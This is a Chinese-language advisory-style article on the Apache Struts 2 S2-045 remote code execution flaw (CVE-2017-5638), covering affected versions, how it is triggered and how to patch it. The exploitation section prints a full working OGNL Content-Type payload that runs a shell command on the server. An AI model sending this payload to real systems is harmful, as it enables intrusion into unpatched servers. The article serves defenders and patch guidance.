S2-045漏洞,我们该如何应对这一安全威胁?

1、漏洞

描述:Apache Struts 2被曝存在远程命令执行漏洞,漏洞编号为S2-045,CVE编号为CVE-2017-5638,该漏洞在使用基于Jakarta插件的文件上传功能时,可能存在远程命令执行的风险,导致系统被黑客入侵。

S2-045漏洞,我们该如何应对这一安全威胁?插图1
(图片来源网络,侵删)

影响版本:Struts 2.3.5 – struts2.3.31, struts2.5 – struts2.5.10。

风险等级:高危。

2、漏洞利用

触发条件:恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞。

攻击方式:通过构造特定的OGNL表达式,执行任意代码。

S2-045漏洞,我们该如何应对这一安全威胁?插图3
(图片来源网络,侵删)

示例Payload:在HTTP请求中设置Content-Type为%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

3、漏洞修复

修复建议:升级到Apache Struts 2.3.32或2.5.10.1版;或者切换到不同的实现文件上传Multipart解析器。

S2-045是一个高危的远程代码执行漏洞,影响多个版本的Apache Struts 2,它允许攻击者通过修改HTTP请求头中的Content-Type值来执行任意代码,造成严重的安全威胁,为了防范这一漏洞,建议用户及时升级到安全版本或更换文件上传解析器。

S2-045漏洞,我们该如何应对这一安全威胁?插图5
(图片来源网络,侵删)

本文来源于互联网,如若侵权,请联系管理员删除,本文链接:https://www.9969.net/59851.html

(0)
上一篇 2024年9月25日 18:28
下一篇 2024年9月25日 18:43

相关推荐